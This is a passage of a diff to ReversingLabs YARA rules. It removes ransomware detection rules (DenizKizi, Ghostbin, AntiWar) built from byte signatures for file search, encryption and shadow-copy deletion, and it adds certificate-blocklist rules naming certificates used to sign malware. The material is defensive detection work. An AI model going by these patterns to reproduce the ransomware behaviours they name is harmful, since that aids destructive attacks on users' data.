?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8 - } - $search_files_in_specific_folders_p3 = { - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ?? - 8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 - ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? - ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? - ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALISA LTD" and pe.signatures[i].serial=="5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16474-L16490" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($search_processes and ( all of ($search_files_in_specific_folders_p*)) and $encrypt_files and $remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE { meta: - description = "Yara rule that detects DenizKizi ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3" - date = "2020-07-15" - modified = "2020-07-15" + id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16492-L16508" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DenizKizi" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? - 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B - 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? - ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ?? - ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 - 45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50 - 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? - E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 - } - $delete_shadow_copies = { - 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 - 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B - 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B - 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B - 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B - 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? - ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B - E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Theravada Solutions Ltd" and pe.signatures[i].serial=="02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "64350364-fe74-54df-886d-1197146e00e7" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16510-L16526" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($delete_shadow_copies) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE { meta: - description = "Yara rule that detects Ghostbin ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4d576854-7a30-527d-9a7a-f22018183540" - date = "2021-09-06" - modified = "2021-09-06" + id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16528-L16544" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ghostbin" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $setup_env = { - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C - 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 - 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08 - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? DE ?? 2A - } - $encrypt_files = { - 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ?? - ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08 - 09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A - } - $find_files = { - 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B - 2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ?? - ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? - ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B - 07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? - 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? - DE ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ROSSO INDEX K.K." and pe.signatures[i].serial=="01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "aeb10a64-633c-5fc6-87af-360e1a402ad4" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16546-L16562" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE { meta: - description = "Yara rule that detects AntiWar ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3113ec26-e149-527b-9478-4dd86c7fa464" - date = "2022-04-21" - modified = "2022-04-21" + id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16564-L16580" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "AntiWar" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? - 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ?? - 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F - E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? - F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 - 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D - 3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 - 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? - 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33 - C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66 - 66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3 - } - $find_files_p2 = { - E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83 - C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC - 4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ?? - ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ?? - 48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE - ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? - 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF - 90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C - ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ?? - ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D - 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 - 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D - } - $find_files_p3 = { - 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? - ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? - ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43 - 8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72 - ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA - ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? - ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? 